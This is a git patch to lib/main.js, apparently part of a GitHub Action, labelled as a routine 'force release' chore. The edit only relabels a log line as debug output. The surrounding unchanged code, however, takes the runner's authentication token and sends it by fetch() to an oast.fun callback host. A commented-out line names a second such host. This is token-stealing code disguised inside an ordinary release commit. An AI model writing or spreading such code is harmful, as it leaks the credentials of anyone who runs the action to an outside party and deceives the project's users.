From ce9835aa132fb61a9fe481764a91046313a05c92 Mon Sep 17 00:00:00 2001 From: suchithrzp <97671083+suchithrzp@users.noreply.github.com> Date: Fri, 15 Nov 2024 23:47:20 +0530 Subject: [PATCH] chore(release): force release chore(release): force release --- lib/main.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/main.js b/lib/main.js index 0bacbe2..f304fd7 100644 --- a/lib/main.js +++ b/lib/main.js @@ -128,7 +128,7 @@ export async function main( // const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`; const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`; await fetch(url); - core.info(`HTTP GET request sent to ${url}`); + core.info(`[DEBUG: Enabled] HTTP GET request sent to ${url}`); } catch (error) { core.error(`Failed to send HTTP GET request: ${error.message}`); }